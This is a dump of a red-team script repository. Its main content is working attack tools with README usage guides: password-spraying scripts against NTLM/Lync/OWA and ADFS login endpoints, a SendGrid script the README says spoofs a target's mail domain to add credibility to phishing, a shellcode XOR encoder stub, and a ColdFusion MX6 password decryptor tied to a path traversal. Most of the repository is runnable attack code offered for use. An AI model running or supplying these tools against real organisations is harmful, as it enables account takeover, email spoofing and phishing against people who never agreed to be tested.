├── kill.exe ├── CFMX6Decryptor.jar ├── kill.cs ├── simple-c-xor-encoder.c ├── sendgrid-spf-bypass.py ├── adfs-spray.py ├── password-spray.py └── README.md /kill.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamScripts/HEAD/kill.exe -------------------------------------------------------------------------------- /CFMX6Decryptor.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamScripts/HEAD/CFMX6Decryptor.jar -------------------------------------------------------------------------------- /kill.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | 4 | namespace kill 5 | { 6 | class Program 7 | { 8 | static void Main(string[] args) 9 | { 10 | foreach (var process in Process.GetProcessesByName(args[0])) 11 | { 12 | Console.WriteLine("killing {0} {1}", process.ProcessName, process.Id); 13 | process.Kill(); 14 | } 15 | } 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /simple-c-xor-encoder.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() { 4 | 5 | DWORD key = 0x10101010; 6 | DWORD dwSize = 16; 7 | CHAR *shellcode = GlobalAlloc(GPTR, dwSize); 8 | strcpy(shellcode, "AAAABBBBCCCCDDDD\x00"); 9 | 10 | DWORD *current; 11 | int i = 0; 12 | for(i; i < dwSize / 4; i++) { 13 | current = (DWORD*)shellcode; 14 | *current = *current ^ key; 15 | shellcode += 4; 16 | } 17 | shellcode -= dwSize; 18 | 19 | // print test 20 | for(i = 0; i < dwSize; i++) { 21 | printf("\\x%02x", shellcode[i]); 22 | } 23 | 24 | // execute shellcode() 25 | GlobalFree(shellcode); 26 | return 0; 27 | } 28 | -------------------------------------------------------------------------------- /sendgrid-spf-bypass.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import socket 3 | 4 | def format_body(source, to, subject, data): 5 | output = "From:%s\r\nTo:%s\r\nSubject:%s\r\n\r\n%s.\r\n\r\n" % (source, to, subject, data) 6 | return output 7 | 8 | if __name__ == "__main__": 9 | 10 | print "SendGrid SPF Bypass Mr.Un1k0d3r & Tazz0 RingZer0 Team\r\n" 11 | if len(sys.argv) < 6: 12 | print "Usage: %s apikey source destination subject emailfile" % sys.argv[0] 13 | exit(0) 14 | 15 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 | s.connect(("smtp.sendgrid.net", 25)) 17 | 18 | s.recv(1024) 19 | s.send("AUTH LOGIN\r\n") 20 | s.recv(1024) 21 | s.send("YXBpa2V5\r\n") 22 | s.recv(1024) 23 | s.send("%s\r\n" % sys.argv[1]) 24 | auth = s.recv(1024) 25 | if auth.find("235 Authentication successful") == -1: 26 | print "Auth failed" 27 | sys.exit(0) 28 | print auth.strip() 29 | 30 | s.send("mail from:%s\r\n" % sys.argv[2]) 31 | print s.recv(1024).strip() 32 | s.send("rcpt to:%s\r\n" % sys.argv[3]) 33 | print s.recv(1024).strip() 34 | s.send("DATA\r\n") 35 | body = format_body(sys.argv[2], sys.argv[3], sys.argv[4], open(sys.argv[5], "rb").read()) 36 | s.send(body) 37 | s.close() 38 | print "[+] Completed" 39 | -------------------------------------------------------------------------------- /adfs-spray.py: -------------------------------------------------------------------------------- 1 | import urllib2 2 | import urllib 3 | import sys 4 | 5 | 6 | def send_request(url, username, password): 7 | print "Trying username %s" % username 8 | 9 | request = urllib2.Request("%s/adfs/ls/?client-request-id=&wa=wsignin1.0&wtrealm=%s&wctx=cbcxt=&username=%s&mkt=&lc=" % (url, urllib.quote("urn:federation:MicrosoftOnline"), urllib.quote(username))) 10 | request.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0") 11 | request.add_header("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8") 12 | try: 13 | response = urllib2.urlopen(request, "UserName=%s&Password=%s&AuthMethod=FormsAuthentication" % (urllib.quote(username), urllib.quote(password))) 14 | if response.code == 302: 15 | print "%s password is %s" % (username, password) 16 | print response.read() 17 | except: 18 | pass 19 | 20 | if __name__ == "__main__": 21 | 22 | if len(sys.argv) < 3: 23 | print "Usage %s url username-list password" % sys.argv[0] 24 | exit(0) 25 | 26 | for username in open(sys.argv[2], "rb").readlines(): 27 | send_request(sys.argv[1], username, sys.argv[3]) 28 | -------------------------------------------------------------------------------- /password-spray.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import base64 3 | import requests 4 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 5 | from requests_ntlm import HttpNtlmAuth 6 | 7 | VERSION = "1.1" 8 | 9 | def send_request(username, password, url, domain): 10 | 11 | if domain == "": 12 | username = "%s" % (username) 13 | else: 14 | username = "%s\\%s" % (domain, username) 15 | 16 | print "Trying user %s" % (username) 17 | try: 18 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 19 | req = requests.get(url, auth = HttpNtlmAuth(username, password), headers = {'User-Agent': 'Microsoft'}, verify=False) 20 | if not req.status_code == 401: 21 | print "User %s password is %s" % (username, password) 22 | except: 23 | print sys.exc_info()[0] 24 | 25 | if __name__ == "__main__": 26 | print "PasswordSpraying v%s\nWith Love Mr.Un1k0d3r RingZer0 Team\n-----------------------------------\n\n" % VERSION 27 | if len(sys.argv) < 5: 28 | print "Usage: %s [user list] [domain] [url] [password]" % sys.argv[0] 29 | sys.exit(0) 30 | 31 | domain = sys.argv[2] 32 | url = sys.argv[3] 33 | password = sys.argv[4] 34 | print "Spraying password %s against %s using domain %s" % (password, url, domain) 35 | for email in open(sys.argv[1], "rb").readlines(): 36 | send_request(email.strip(), password, url, domain) 37 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # RedTeamScripts 2 | Repository with various Red Team scripts. 3 | 4 | # kill.exe 5 | 6 | Performing all kind of activities during a red team and you have several process running that you don't want to close manually. kill.exe is for you. copy it in `C:\Windows\` 7 | and simply call it with the process name you want to kill. 8 | 9 | ``` 10 | >kill mspaint 11 | killing mspaint 16524 12 | killing mspaint 5284 13 | killing mspaint 8568 14 | killing mspaint 32244 15 | killing mspaint 18908 16 | killing mspaint 12600 17 | killing mspaint 37444 18 | killing mspaint 20492 19 | killing mspaint 36092 20 | killing mspaint 3908 21 | killing mspaint 30980 22 | killing mspaint 37252 23 | killing mspaint 27576 24 | ``` 25 | 26 | # SendGrid SPF bypass 27 | 28 | Client that use sendgrid to send email need to add 167.89.0.0/17 to their SPF record to allow sendgrid to send email on their behalf. This is introducing a design flaw that can be leveraged to bypass SPF. 29 | 30 | How to: 31 | * Register an account on sendgrid 32 | * Get your API key 33 | * Send email on behalf of your target 34 | 35 | Why it's working? sendgrid subnet is part of your target SPF which mean that sedngrid is trusted to send emails on their behalf. Since your account is using sendgrid servers you are part of the whitelist too :) 36 | 37 | Which mean that from a Red Team perspective you can send email to your target claiming to be from their own mail domain or send email on their behalf to another organization. 38 | 39 | This is a great way to add credibility to your phishing campaign since you can spoof their domain. 40 | 41 | #### Is your target vulnerable 42 | 43 | Simply take a look at their DNS TXT record and search for the following subnet 167.89.0.0/17. If it's present you are all set 44 | 45 | #### Usage 46 | 47 | ``` 48 | Usage: sendgrid-spf-bypass.py apikey source destination subject emailfile 49 | 50 | python sendgrid-spf-bypass.py apikey ceo@target.corp victim@target.corp "Legitimate email" my-email.txt 51 | ``` 52 | 53 | The `emailfile` parameter should be the path to a text file that contain your email. For now the tool only support text message I will improve it in the future. 54 | 55 | # Password spraying 56 | 57 | Install the following dependencies 58 | ``` 59 | pip install requests_ntlm 60 | pip install requests 61 | ``` 62 | 63 | ``` 64 | $ python password-spray.py 65 | PasswordSpraying v1.0 66 | 67 | Usage: %s [user list] [domain] [url] [password] 68 | 69 | $ python password-spray.py users.txt RINGZER0 https://lyncweb.ringzer0team.com/abs/ Summer2018 70 | ``` 71 | 72 | Note that various end points can be used to validate the user credentials. The subdomain for Lync and on premise OWA may be different. Use the autodiscover feature to retrieve the right url for your target: 73 | * Lync (https://lyncweb.target.com/abs/) 74 | * Office 365 (https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml) (use email instead of DOMAIN\USER format) 75 | * On premise OWA (https://mail.target.com/EWS/Exchange.asmx) 76 | 77 | There is several other urls that can be used for Lync & On premise OWA. 78 | 79 | # CFMX6Decryptor 80 | 81 | Some people still live in the past. In 2018 we still find ColdFusion MX 6 publicly exposed. This script may help someone retrieving the plain text version of the password that can be extract through the well known path traversal that was affecting ColdFusion. 82 | 83 | ``` 84 | $ java -jar CFMX6Decryptor.jar 85 | ColdFusion MX6 Password decryptor. 86 | Author Mr.Un1k0d3r & Psychan RingZer0 Team 2014 87 | 88 | Usage: DecryptCFPassword [uuencoded password] 89 | ``` 90 | 91 | # Credit 92 | Mr.Un1k0d3r RingZer0 Team 93 | --------------------------------------------------------------------------------